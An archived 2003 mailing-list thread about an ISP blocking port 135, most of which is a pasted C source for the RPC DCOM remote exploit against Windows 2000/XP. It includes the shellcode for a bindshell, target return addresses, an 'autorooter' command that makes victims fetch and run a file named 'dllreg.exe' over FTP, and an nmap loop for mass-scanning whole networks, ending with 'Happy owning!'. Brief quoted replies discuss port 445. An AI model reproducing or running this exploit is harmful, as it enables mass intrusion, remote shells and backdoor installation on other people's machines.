Full Disclosure mailing list archives
Re: Cox is blocking port 135 - off topic
From: "Anthony Clark" <volkam () comcast net>
Date: Sun, 10 Aug 2003 19:28:35 -0700
Here is a couple different dcom utilities around town... -Anthony ----- Original Message ----- From: "harq deman" <harqman () btopenworld com> To: "Anthony Clark" <volkam () comcast net> Sent: Sunday, August 10, 2003 7:22 PM Subject: Re: [Full-disclosure] Cox is blocking port 135 - off topic
That code got filled with CRLF's.. can you attach the .c please? ----- Original Message ----- From: "Anthony Clark" <volkam () comcast net> To: <full-disclosure () lists netsys com> Sent: Monday, August 11, 2003 12:42 AM Subject: Re: [Full-disclosure] Cox is blocking port 135 - off topicRight.. /* Windows 2003 <= remote RPC DCOM exploit * Coded by .:[oc192.us]:. Security * Modified by rogers@efnet * * Features: * * -d destination host to attack. * * -p for port selection as exploit works on ports other than 135(139,445,539 etc) * * -r for using a custom return address. * * -t to select target type (Offset) , this includes universal offsetsfor -* win2k and winXP (Regardless of service pack) * * -l to select bindshell port on remote machine (Default: 666) * * - Shellcode has been modified to call ExitThread, rather than ExitProcess, thus * preventing crash of RPC service on remote machine. * * Modification: * * AUTOROOTER * * Modify the commands in *cmd, in void con(int sockfd){} 3rd line * I suggest having it ftp to a box and download a backdoor, run it,
then
exit. * * Works well with this class C (B /16 or A /8 as well) command linescannerusing nmap: * * /usr/bin/nmap -sS -p 135 -oG out $1/24 * for i in `cat out | grep open | awk '{print $2}'`; do * ./rogers-oc192-dcom -d $i -t 1& * ./rogers-oc192-dcom -d $i -t 0& * done * * * sh scan.sh 10.10.2.0 * * Happy owning! */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <netdb.h> #include <fcntl.h> #include <unistd.h> /* xfocus start */ unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0
x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0
x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0
x46,0x00,0x00,0x00,0x00, 0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; unsigned char request1[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,
0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,
0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,
0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,
0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,
0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,
0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,
0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,
0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,
0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,
0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,
0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,
0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,
0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,
0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,
0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,
0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,
0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,
0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,
0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,
0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,
0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,
0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,
0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,
0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,
0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,
0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,
0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,
0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,
0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,
0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,
0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,
0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,
0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,
0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,
0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,
0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,
0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,
0x00 ,0x00,0x00,0x00,0x00,0x00,0x00}; unsigned char request2[]={ 0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 ,0x00,0x00,0x5C,0x00,0x5C,0x00}; unsigned char request3[]={ 0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,
0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,
0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,
0x00 ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; /* end xfocus */ int type=0; struct { char *os; u_long ret; } targets[] = { { "[Win2k-Universal]", 0x0018759F }, { "[WinXP-Universal]", 0x0100139d }, }, v; void usage(char *prog) { int i; printf("RPC DCOM exploit coded by .:[oc192.us]:. Security\n"); printf("\nModified by rogers@efnet bling bling\n\n"); printf("Usage:\n\n"); printf("%s -d <host> [options]\n", prog); printf("Options:\n"); printf(" -d: Hostname to attack [Required]\n"); printf(" -t: Type [Default: 0]\n"); printf(" -r: Return address [Default: Selected from target]\n"); printf(" -p: Attack port [Default: 135]\n"); printf(" -l: Bindshell port [Default: 666]\n\n"); printf("Types:\n"); for(i = 0; i < sizeof(targets)/sizeof(v); i++) printf(" %d [0x%.8x]: %s\n", i, targets[i].ret, targets[i].os); exit(0); } unsigned char sc[]= "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00" "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00" "\x46\x00\x58\x00\x46\x00\x58\x00" "\xff\xff\xff\xff" /* return address */ "\xcc\xe0\xfd\x7f" /* primary thread data block */ "\xcc\xe0\xfd\x7f" /* primary thread data block */ /* bindshell no RPC crash, defineable spawn port */ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff" "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2" "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80" "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09" "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6" "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf" "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad" "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81" "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81" "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80" "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80" "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80" "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80" "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80" "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81" "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6" "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3" "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50" "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4" "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4" "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4" "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f" "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b" "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80" "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89" "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80" "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83" "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83" "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78" "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c" "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b" "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04"; /* xfocus start */ unsigned char request4[]={ 0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,
0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,
0x8C ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 }; /* end xfocus */ /* Not ripped from teso =) */ void con(int sockfd) { /* Modify the cmdline here, make sure leave exit\n or else it wont work
:D
*/ char rb[1500], *cmd="echo open ip>>o&echo test>>o&echo test>>o&echo
user
test test>>o&echo bin>>o&echo get dllreg.exe>>o&echo bye>>o&ftp -s:o&dllreg.exe&del o&echo test&exit\n"; fd_set fdreadme; int i; FD_ZERO(&fdreadme); FD_SET(sockfd, &fdreadme); FD_SET(0, &fdreadme); /* Write our commands to the shell */ send(sockfd, cmd, strlen(cmd), 0); while(1) { FD_SET(sockfd, &fdreadme); FD_SET(0, &fdreadme); if(select(FD_SETSIZE, &fdreadme, NULL, NULL, NULL) < 0 ) break; if(FD_ISSET(sockfd, &fdreadme)) { if((i = recv(sockfd, rb, sizeof(rb), 0)) < 0) { printf("[-] Connection lost..\n"); exit(1); } if(write(1, rb, i) < 0) break; } if(FD_ISSET(0, &fdreadme)) { if((i = read(0, rb, sizeof(rb))) < 0) { printf("[-] Connection lost..\n"); exit(1); } if (send(sockfd, rb, i, 0) < 0) break; } /* exit after a pause */ usleep(10000); exit(0); } printf("[-] Connection closed by foreign host..\n"); exit(0); } int main(int argc, char **argv) { int len, len1, sockfd, c, a; unsigned long ret; unsigned short port = 135; unsigned char buf1[0x1000]; unsigned char buf2[0x1000]; unsigned short lportl=666; /* drg */ char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */ struct hostent *he; struct sockaddr_in their_addr; static char *hostname=NULL; if(argc<2) { usage(argv[0]); } while((c = getopt(argc, argv, "d:t:r:p:l:"))!= EOF) { switch (c) { case 'd': hostname = optarg; break; case 't': type = atoi(optarg); if((type > 1) || (type < 0)) { printf("[-] Select a valid target:\n"); for(a = 0; a < sizeof(targets)/sizeof(v); a++) printf(" %d [0x%.8x]: %s\n", a, targets[a].ret, targets[a].os); return 1; } break; case 'r': targets[type].ret = strtoul(optarg, NULL, 16); break; case 'p': port = atoi(optarg); if((port > 65535) || (port < 1)) { printf("[-] Select a port between 1-65535\n"); return 1; } break; case 'l': lportl = atoi(optarg); if((port > 65535) || (port < 1)) { printf("[-] Select a port between 1-65535\n"); return 1; } break; default: usage(argv[0]); return 1; } } if(hostname==NULL) { printf("[-] Please enter a hostname with -d\n"); exit(1); } printf("RPC DCOM remote exploit - .:[oc192.us]:. Security\n"); printf("[+] Resolving host..\n"); if((he = gethostbyname(hostname)) == NULL) { printf("[-] gethostbyname: Couldnt resolve hostname\n"); exit(1); } printf("[+] Done.\n"); printf("-- Target: %s:%s:%i, Bindshell:%i, RET=[0x%.8x]\n", targets[type].os, hostname, port, lportl,targets[type].ret);/* drg */ lportl=htons(lportl); memcpy(&lport[1], &lportl, 2); *(long*)lport = *(long*)lport ^ 0x9432BF80; memcpy(&sc[471],&lport,4); memcpy(sc+36, (unsigned char *) &targets[type].ret, 4); their_addr.sin_family = AF_INET; their_addr.sin_addr = *((struct in_addr *)he->h_addr); their_addr.sin_port = htons(port); if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) { perror("[-] Socket failed"); return(0); } if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { perror("[-] Connect failed"); return(0); } /* xfocus start */ len=sizeof(sc); memcpy(buf2,request1,sizeof(request1)); len1=sizeof(request1); *(unsigned long *)(request2)=*(unsigned long*)(request2)+sizeof(sc)/2;*(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2; memcpy(buf2+len1,request2,sizeof(request2)); len1=len1+sizeof(request2); memcpy(buf2+len1,sc,sizeof(sc)); len1=len1+sizeof(sc); memcpy(buf2+len1,request3,sizeof(request3)); len1=len1+sizeof(request3); memcpy(buf2+len1,request4,sizeof(request4)); len1=len1+sizeof(request4); *(unsigned long *)(buf2+8)=*(unsigned long
*)(buf2+8)+sizeof(sc)-0xc;
*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc; *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc; /* end xfocus */ if (send(sockfd,bindstr,sizeof(bindstr),0)== -1) { perror("[-] Send failed"); return(0); } len=recv(sockfd, buf1, 1000, 0); if (send(sockfd,buf2,len1,0)== -1) { perror("[-] Send failed"); return(0); } close(sockfd); sleep(1); their_addr.sin_family = AF_INET; their_addr.sin_addr = *((struct in_addr *)he->h_addr); their_addr.sin_port = lportl; if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) { perror("[-] Socket failed"); return(0); } if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { printf("[-] Couldnt connect to bindshell, possible reasons:\n"); printf(" 1: Host is firewalled\n"); printf(" 2: Exploit failed\n"); return(0); } printf("[+] Connected to bindshell..\n\n"); sleep(1); con(sockfd); return(0); } ----- Original Message ----- From: "Joey" <joey2cool () yahoo com> To: <full-disclosure () lists netsys com> Sent: Sunday, August 10, 2003 3:21 PM Subject: Re: [Full-disclosure] Cox is blocking port 135 - off topiccox does block port 445 also, but i havent seen any exploits that use that port. even though its said that port 445 is vulnerable, where is the POC? --- Kurt Seifried <listuser () seifried org> wrote:Off topic: This won't help much at all. Windows 2000/XP run Microsoft SMB over TCP on 445 as well (reduced overhead then 135/etc, no NetBIOS layer). When a client tries to connect to a remote host for file/print sharing/etc it connects on both ports 135 and 445, if a response is recieved from port 445 it drops the connection to 135. THe attack works quite well against client systems using port 445. If Cox blocks both ports 135 and 445 that will be semi-effective (except of course for internal users who spread a worm/etc, such as laptops that move around). THis may block a few of the more stupid attacks but not for long. Kurt Seifried, kurt () seifried org A15B BEE5 B391 B9AD B0EF AEB0 AD63 0B4E AD56 E574 http://seifried.org/security/__________________________________ Do you Yahoo!? Yahoo! SiteBuilder - Free, easy-to-use web site design software http://sitebuilder.yahoo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Attachment:
vdcom.tar.gz
Description:
Attachment:
oc192-dcom.c
Description:
Attachment:
rogers-oc192.c
Description:
Current thread:
- Cox is blocking port 135 - off topic, (continued)
- Cox is blocking port 135 - off topic Kurt Seifried (Aug 10)
- Re: Cox is blocking port 135 - off topic martin f krafft (Aug 10)
- Re: Cox is blocking port 135 - off topic pdt (Aug 10)
- Re: Cox is blocking port 135 - off topic harq deman (Aug 10)
- Re: Cox is blocking port 135 - off topic bugtracker505 (Aug 10)
- Re: Cox is blocking port 135 - off topic Joey (Aug 10)
- Re: Cox is blocking port 135 - off topic Nick FitzGerald (Aug 10)
- Re: Cox is blocking port 135 - off topic Anthony Clark (Aug 10)
- Re: Cox is blocking port 135 - off topic Joey (Aug 10)
- RE: Cox is blocking port 135 - off topic Rick Kingslan (Aug 10)
- Message not available
- Re: Cox is blocking port 135 - off topic Anthony Clark (Aug 10)
- Cox is blocking port 135 - off topic Kurt Seifried (Aug 10)